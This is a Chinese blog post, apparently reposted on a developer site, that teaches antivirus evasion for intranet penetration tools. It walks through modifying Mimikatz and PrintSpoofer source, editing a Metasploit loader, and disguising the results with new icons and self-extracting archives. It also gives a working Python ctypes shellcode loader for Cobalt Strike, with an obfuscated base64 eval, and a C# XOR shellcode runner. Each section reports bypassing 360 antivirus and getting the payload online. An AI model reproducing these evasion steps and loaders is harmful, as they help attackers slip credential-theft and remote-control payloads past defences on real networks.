内网渗透神器_内网渗透什么意思

内网渗透神器_内网渗透什么意思内网渗透-常用工具免杀Mimikatz免杀Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

内网渗透-常用工具免杀

Mimikatz免杀

Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工具特别出名所以被查杀的机率很大, 我们可以通过 github 上的开源代码对其进行源码免杀从而 bypass 反病毒软件。
Mimikatz 源代码下载 https://github.com/gentilkiwi/mimikatz
免杀步骤
替换 mimikatz 关键字 shenghuo
内网渗透神器_内网渗透什么意思
mimikatz 下的文件全部改为 shenghu
内网渗透神器_内网渗透什么意思
把项目里所有的文件注释去掉
/_ Benjamin DELPY gentilkiwi http://blog.gentilkiwi.com benjamin@gentilkiwi.com Licence : https://creativecommons.org/licenses/by/4.0/ _/
内网渗透神器_内网渗透什么意思
打开红色框框内的内容,替换图标文件
内网渗透神器_内网渗透什么意思
出现 无法找到 v140 的生成工具(平台工具集 =“v140”),要选择自己安装的平台工具集
内网渗透神器_内网渗透什么意思
重新生成
内网渗透神器_内网渗透什么意思
生成的程序能够正确运行
内网渗透神器_内网渗透什么意思
成功过360
内网渗透神器_内网渗透什么意思
PrintSpoofer做免杀
printspoofer提权工具目前主流的提权工具之一,360 安全会自动查杀,其他杀毒软件并不会查杀。
源码下载地址:
https://github.com/itm4n/PrintSpoofer
内网渗透神器_内网渗透什么意思
将PrintSpoofer.cpp 里面的输出帮助文档全部清空
内网渗透神器_内网渗透什么意思
导入图标
内网渗透神器_内网渗透什么意思
重新生成,程序生成成功
内网渗透神器_内网渗透什么意思

成功过360
内网渗透神器_内网渗透什么意思

msf免杀

metasploit 是一款开源的安全漏洞检测工具,同时Metasploit 是免费的工具,因此安全工作人员常用 Metasploit 工具来检测系统的安全性。Metasploit Framework (MSF) 在 2003 年以开放源码方式发布,是可以自由获取的开发框架。 它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、 shellcode 编写和漏洞研究提供了一个可靠平台。其中攻击载荷模块(Payload) , 在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且 Metasploit 还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混 淆绕过一部分杀毒软件。
工具 Dev-Cpp 5.11 TDM-GCC 4.9.2 Setup 下载地址 https://sourceforge.net/projects/orwelldevcpp/
metasploit源码下载:metasploit-loader/master/src/main.c
选择:文件->新建项目->consoleApplication->c 项目
内网渗透神器_内网渗透什么意思
把winsock2.h 移动到windows.h 上 不然编译会出错。
内网渗透神器_内网渗透什么意思
将这四处的数字改为其他数字
内网渗透神器_内网渗透什么意思
设置攻击载荷,执行后成功上线
内网渗透神器_内网渗透什么意思
成功过360
内网渗透神器_内网渗透什么意思

Python3 对Cobalt strike的 shellcode 做免杀

生成python64位的shellcode
内网渗透神器_内网渗透什么意思
添加生成的shellcode

import ctypesimport base64#shellcode 加载def shellCodeLoad(shellcode):    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c\_uint64    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c\_int(0),ctypes.c\_int(len(shellcode)), ctypes.c\_int(0x3000),ctypes.c\_int(0x40))    buf= (ctypes.c\_char * len(shellcode)).from\_buffer(shellcode)    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))    handle =ctypes.windll.kernel32.CreateThread(ctypes.c\_int(0),ctypes.c\_int(0),ctypes.c\_uint64( ptr),ctypes.c\_int(0),ctypes.c\_int(0),ctypes.pointer(ctypes.c\_int(0)))    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c\_int(handle),ctypes.c\_int(-1))if \_\_name__ == "\_\_main\_\_":    shellCodeLoad(bytearray(b'你的shellcode'))//这里为你的添加的shellcode位置

编译成程序
pyinstaller -F test.py —noconsole
此时还要做的就是更改图标,这里介绍一种方法
首先右击它,选择“添加到压缩文件”
内网渗透神器_内网渗透什么意思
在弹出来的一个“压缩文件名和参数”框中设置压缩文件格式为“ZIP”,压缩方式为“存储”,压缩选项为“创建自解压格式压缩文件”。
内网渗透神器_内网渗透什么意思
随后选择“高级”选项卡。选择了“高级”选项卡以后直接点击“自解压选项”
内网渗透神器_内网渗透什么意思
在设置选项卡中解压后运行对应程序
内网渗透神器_内网渗透什么意思
在模式选项卡中选择解压临时文件夹和全部隐藏
内网渗透神器_内网渗透什么意思
随后再选择“更新”选项卡,再覆盖方式中选择“覆盖所有文件”
内网渗透神器_内网渗透什么意思
最后选择“文本和图标”选项卡,在自定义自解压文件徽标和图标中选择“从文件加载自解压文件图标”,点击“浏览”,找到自己想要加载的图标文件后并打开
内网渗透神器_内网渗透什么意思
然后就点击确定(两次)就可以生成一个新的exe程序了。图标已经改变了,再运行测试一下
内网渗透神器_内网渗透什么意思
上传去目标主机,这里更改了程序名称
内网渗透神器_内网渗透什么意思
在线查杀
内网渗透神器_内网渗透什么意思

c# xor 加载器免杀cobaltstrike的shellcode

是很流行的编程语言,也可以用它来做一个加载器运行cobaltstrike的 shellcode,生成出来的 文件特别的小,可以很好的投递传输。
项目地址 https://github.com/antman1p/ShellCodeRunner 用 vs2017 打开 sln 项目文件
内网渗透神器_内网渗透什么意思
选择 xorkryptor 生成编码器 用 cobalt strike生成 raw 二进制文件
内网渗透神器_内网渗透什么意思
encrypt.bin 就是经过编码后的文件
内网渗透神器_内网渗透什么意思
项目里面存有 Rsources 和 encrypt.bin 文件 事实上项目是没有这个文件夹和文 件所以再当前目录新建文件夹和将生成好的shellcode文件 encrypt.bin 复制到文 件夹里。右键选择编译文件即可。
内网渗透神器_内网渗透什么意思
此时文件正常
内网渗透神器_内网渗透什么意思
重新编译,成功生成后门程序
内网渗透神器_内网渗透什么意思
成功过360
内网渗透神器_内网渗透什么意思
成功上线
内网渗透神器_内网渗透什么意思

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/171368.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • Pycharm调试_pycharm打开远程项目

    Pycharm调试_pycharm打开远程项目1.前期准备保证有一台Linux(我用的是ubuntuserver1404),系统自带python以及python3环境;保证安装pycharm的设备可以ssh上去,这个就不多说了.推荐采用本机安装虚拟机,不要问为啥不直接使用本机的python,,,,因为调试时有些包在window上确实不好办,还有一点,Linux上做开发确实爽.2.配置pycharm2….

    2025年7月28日
    2
  • 小区智能化设计方案简述_智慧设计

    小区智能化设计方案简述_智慧设计在智慧城市大前提下的智慧小区的建设势必将借助高精尖技术的帮助,产业的发展带来大数据、人工智能技术、智能安全机器人、云计算和物联网等相关技术的突破,技术的成熟应用又为智慧小区提供强有力的技术保障,产业的繁荣将为智慧小区满足规模化应用条件,最终促进产业升级、经济发展,为城市注入新活力。实现汇聚社区内出入口、公共区域监控、单元门、单位大门等区域结构化摄像机、车辆卡口、人脸智能门禁等智能前端,真正做到“人过留影、车过留牌”,不仅对社区安全进行全方位安全保障,同时为公安部门情报研判、人口管理提供前提条件,实现事前预警

    2022年10月17日
    3
  • 代码农民提高生产力

    代码农民提高生产力

    2022年1月4日
    51
  • J2me开发大致框架「建议收藏」

    J2me开发大致框架「建议收藏」J2me开发名目繁多.但大致框架还算有规律可寻,我根据开发经验给大家提点意见,做下总结:游戏的结构很多,不过基本上都是在一个游戏主循环内实现。程序里面的主循环包含了程序框架的最主要的结构体。J2me的程序一般都包含两个class文件,一个是MIDlet,一个是Displayable。一般我都是把游戏的主要代码放在Displayable这个类里面。这个类是基

    2022年7月27日
    6
  • Linux学习-vmware虚拟机安装tomcat

    Linux学习-vmware虚拟机安装tomcat

    2022年2月24日
    144
  • 解决oracle创建用户不能登录

    解决oracle创建用户不能登录//用system身份登录SQL>createuserusernameidentifiedbyuserpwd;用户已创建SQL>grantconnecttousername;授权成功。SQL>connusername/userpwd;已连接。//此时新创建的用不能创建表的….若要创建的用户能够…

    2022年5月18日
    39

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号